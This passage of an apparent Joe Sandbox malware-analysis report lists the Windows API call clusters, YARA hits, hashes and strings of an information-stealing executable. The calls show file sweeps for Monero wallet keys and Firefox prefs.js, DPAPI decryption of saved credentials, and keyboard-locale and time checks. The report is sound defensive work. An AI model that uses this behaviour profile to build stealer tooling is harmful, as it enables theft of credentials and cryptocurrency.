                      • FindClose.KERNEL32(000000FF), ref: 004746A0
                      • lstrcat.KERNEL32(?,00E8E230), ref: 004746C5
                      • lstrcat.KERNEL32(?,00E8D1F8), ref: 004746D8
                      • lstrlen.KERNEL32(?), ref: 004746E5
                      • lstrlen.KERNEL32(?), ref: 004746F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*$0
                      • API String ID: 671575355-2955795000
                      • Opcode ID: fc9755106767d0894ec18d17e0ae63a4c92e186511b4cd3da9ec6689c79ca81b
                      • Instruction ID: 567b18084694f579f57213b73da0fbe1ed532b4075b8429579f11f14c5abe7bc
                      • Opcode Fuzzy Hash: fc9755106767d0894ec18d17e0ae63a4c92e186511b4cd3da9ec6689c79ca81b
                      • Instruction Fuzzy Hash: 065166B5550218ABC764FBB0DC89FEE737DAB54300F40858AB60D92150EB78EB84CF96
                      APIs
                      • wsprintfA.USER32 ref: 00473EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00473EDA
                      • StrCmpCA.SHLWAPI(?,00480FAC), ref: 00473F08
                      • StrCmpCA.SHLWAPI(?,00480FB0), ref: 00473F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0047406C
                      • FindClose.KERNEL32(000000FF), ref: 00474081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$0
                      • API String ID: 180737720-3690862327
                      • Opcode ID: 0b8a60b26f76aaedcf8a2aa466a7b79df4e21ce05be63615acbafe8fa566bd45
                      • Instruction ID: daefb126cd45605ca6b2f5d973187272c3bf82a41e05b6bf8f56423e646a35d0
                      • Opcode Fuzzy Hash: 0b8a60b26f76aaedcf8a2aa466a7b79df4e21ce05be63615acbafe8fa566bd45
                      • Instruction Fuzzy Hash: 3E5133B2900218ABCB64FBA0DC45EEA737DBB44304F00858EB65996140EB79AB89CF55
                      APIs
                      • wsprintfA.USER32 ref: 0046ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0046ED55
                      • StrCmpCA.SHLWAPI(?,00481538), ref: 0046EDAB
                      • StrCmpCA.SHLWAPI(?,0048153C), ref: 0046EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0046F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: a7d52ff333251c7bfee4a32b22f0a5cd676395c84c1313f16c5a29e5e0f2c8a6
                      • Instruction ID: 6ef5f4e43cac664f1c3145998c227907d551933b044b8bf33f937c40ab08d07c
                      • Opcode Fuzzy Hash: a7d52ff333251c7bfee4a32b22f0a5cd676395c84c1313f16c5a29e5e0f2c8a6
                      • Instruction Fuzzy Hash: 54E133B18111189ADB54FB61CC51EEE7338AF94304F40859EB51E62052EF386F9ACF6A
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004815B8,00480D96), ref: 0046F71E
                      • StrCmpCA.SHLWAPI(?,004815BC), ref: 0046F76F
                      • StrCmpCA.SHLWAPI(?,004815C0), ref: 0046F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0046FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: b664eed5d5872376b5967753fd8e7060f88919faa95157eefab04e589a84d6f2
                      • Instruction ID: 70466d8c42d3f3c3f59aac13788b61a996e733f5505914ca79f799d6fe69362d
                      • Opcode Fuzzy Hash: b664eed5d5872376b5967753fd8e7060f88919faa95157eefab04e589a84d6f2
                      • Instruction Fuzzy Hash: 30B162719001049BCB24FF65DC56AEE7379AF94304F0085AEA40E97151EF38AB59CF9B
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0048510C,?,?,?,004851B4,?,?,00000000,?,00000000), ref: 00461923
                      • StrCmpCA.SHLWAPI(?,0048525C), ref: 00461973
                      • StrCmpCA.SHLWAPI(?,00485304), ref: 00461989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00461D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00461DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00461E20
                      • FindClose.KERNEL32(000000FF), ref: 00461E32
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: b98fd1a3be70c024c0da57d70730f48606ee93d00389167dfa458f8d6411b211
                      • Instruction ID: bf1ef1a3c630a695e5ea41d253e081e8e9c8e4bfbde98a86ce869abc58d2bf2f
                      • Opcode Fuzzy Hash: b98fd1a3be70c024c0da57d70730f48606ee93d00389167dfa458f8d6411b211
                      • Instruction Fuzzy Hash: FB1235719101189BCB15FB61CC96EEE7338AF94304F41859EB11E62091EF386F99CFA6
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00480C2E), ref: 0046DE5E
                      • StrCmpCA.SHLWAPI(?,004814C8), ref: 0046DEAE
                      • StrCmpCA.SHLWAPI(?,004814CC), ref: 0046DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0046E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: db647b3e4a365648142618f745faaff2bdfbbca3b5299a27e70dc127ddb402be
                      • Instruction ID: 7c7a55b933f77b0f38eaae95c2d6842188ea6ca533f292c939b28a2fd6903848
                      • Opcode Fuzzy Hash: db647b3e4a365648142618f745faaff2bdfbbca3b5299a27e70dc127ddb402be
                      • Instruction Fuzzy Hash: 69F1DF718101189ACB25FB61CC95EEE7338AF54304F5185DFA11E62091EF386F9ACF6A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: %`}{$'~_~$1Z<$GOo{$Hu{$Xg7n$|jy$1_}$87$f<R
                      • API String ID: 0-615228910
                      • Opcode ID: e1426343125cbfab3d3b9f1aff576a60c68b9e5d24e342b6f3a70df342563de6
                      • Instruction ID: da2394967ea96a119131f74f20db538d5b79ba3996595cd7e596a261291f65eb
                      • Opcode Fuzzy Hash: e1426343125cbfab3d3b9f1aff576a60c68b9e5d24e342b6f3a70df342563de6
                      • Instruction Fuzzy Hash: 4CB215F3A0C2049FE304AE2DEC9567ABBE9EF94720F16493DE6C5C3740EA3558018697
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004814B0,00480C2A), ref: 0046DAEB
                      • StrCmpCA.SHLWAPI(?,004814B4), ref: 0046DB33
                      • StrCmpCA.SHLWAPI(?,004814B8), ref: 0046DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0046DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 975f563585b10e80a106089b345a0cc1ab1cb32ae3fabbca7e88642ca26961f3
                      • Instruction ID: 5cc3b4508914264b54bb2772dfe4c9418959142edd8aa47bd4cbbc0e474b2d2c
                      • Opcode Fuzzy Hash: 975f563585b10e80a106089b345a0cc1ab1cb32ae3fabbca7e88642ca26961f3
                      • Instruction Fuzzy Hash: 68916572D0010497CB14FBB1DC569EE737DABC4304F00895EB81A96151FE38AB19CBA7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: )\sj$DDme$DTK|$WC??$[D.$flT,$q9~3$uQ@I$wr
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,004805AF), ref: 00477BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00477BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00477C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00477C62
                      • LocalFree.KERNEL32(00000000), ref: 00477D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00480D73), ref: 0046E4A2
                      • StrCmpCA.SHLWAPI(?,004814F8), ref: 0046E4F2
                      • StrCmpCA.SHLWAPI(?,004814FC), ref: 0046E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                      • LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: NF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Fh}$_i[$ar_$n)+z$p;$w3v7
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0046C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0046C87C
                      • lstrcat.KERNEL32(?,00480B46), ref: 0046C943
                      • lstrcat.KERNEL32(?,00480B47), ref: 0046C957
                      • lstrcat.KERNEL32(?,00480B4E), ref: 0046C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0047696C
                      • sscanf.NTDLL ref: 00476999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004769B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004769C0
                      • ExitProcess.KERNEL32 ref: 004769DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0046724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00467254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00467281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004672A4
                      • LocalFree.KERNEL32(?), ref: 004672AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0047961E
                      • Process32First.KERNEL32(00480ACA,00000128), ref: 00479632
                      • Process32Next.KERNEL32(00480ACA,00000128), ref: 00479647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0047965C
                      • CloseHandle.KERNEL32(00480ACA), ref: 0047967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !kv$=m>$^o]$jQ+<
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00465184,40000001,00000000,00000000,?,00465184), ref: 00478EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: b929bdcc1f425b4ca6a159c48f10760bc50cfe6ef8e87ca48bb643831f224e31
                      • Instruction ID: f78b70e1b7429f98fa02f03cf4c5000eac8c4801a0ce16447a2478282081a7bb
                      • Opcode Fuzzy Hash: b929bdcc1f425b4ca6a159c48f10760bc50cfe6ef8e87ca48bb643831f224e31
                      • Instruction Fuzzy Hash: 48110A70240205AFDB00DFA4D888FAB33AAAF89714F10E549F9198B250DB39E841DF65
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E8DA40,00000000,?,00480E10,00000000,?,00000000,00000000), ref: 00477A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E8DA40,00000000,?,00480E10,00000000,?,00000000,00000000,?), ref: 00477A7D
                      • wsprintfA.USER32 ref: 00477AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 29db0a76c5ece4b8b0f44d8bec1eaf980bb24c652c5781b262b3e394886e013f
                      • Instruction ID: 3e518c5ca2fc0acc09700d27725b686db9c352735568c3ca49dffaf8745e8c67
                      • Opcode Fuzzy Hash: 29db0a76c5ece4b8b0f44d8bec1eaf980bb24c652c5781b262b3e394886e013f
                      • Instruction Fuzzy Hash: C81182B1945218DBEB209F54DC45F99B778FB05711F1047DAE90A932C0C7786E40CF55
                      APIs
                      • CoCreateInstance.COMBASE(0047E118,00000000,00000001,0047E108,00000000), ref: 00473758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004737B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: 9bd8d2dad7d55ef82cbd4d9c92155cdccd7603e0f68319a068869ac49009372d
                      • Instruction ID: 40f89dcfd4bee8ee1e5e89e3de85479f6d9598a78233cf68863449dbf93515e1
                      • Opcode Fuzzy Hash: 9bd8d2dad7d55ef82cbd4d9c92155cdccd7603e0f68319a068869ac49009372d
                      • Instruction Fuzzy Hash: C7410770A00A289FDB24DF58CC95BDBB7B5BB48306F4081D9E608EB290D771AE85CF51
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00469B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00469BA3
                      • LocalFree.KERNEL32(?), ref: 00469BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 58871e53e6618eee25a24afb3f3c05bc8c8d8b21c40c1e96abcf8756a4a91602
                      • Instruction ID: 2bb95dc413f865b69bde54ac921f547ab4f6753b1740f467acb35706008ae465
                      • Opcode Fuzzy Hash: 58871e53e6618eee25a24afb3f3c05bc8c8d8b21c40c1e96abcf8756a4a91602
                      • Instruction Fuzzy Hash: 9311C9B8A00209EFDB04DF94D985AAFB7B9FF89700F104599E915A7350D774AE10CFA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: MU$r^
                      • API String ID: 0-3269954404
                      • Opcode ID: d24695b936d24290f46b545f1884aa233a65042747edc6b5720ee73ef3a7578a
                      • Instruction ID: 8c3b0b5f35b115e31e8a8cf1b39f4377721f2e7d62c11c572fe2fafc8f9d8f25
                      • Opcode Fuzzy Hash: d24695b936d24290f46b545f1884aa233a65042747edc6b5720ee73ef3a7578a
                      • Instruction Fuzzy Hash: 5DB229F3A0C2049FE3046E2DEC8567ABBE9EF94320F16493DEAC4C7744EA3558458697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
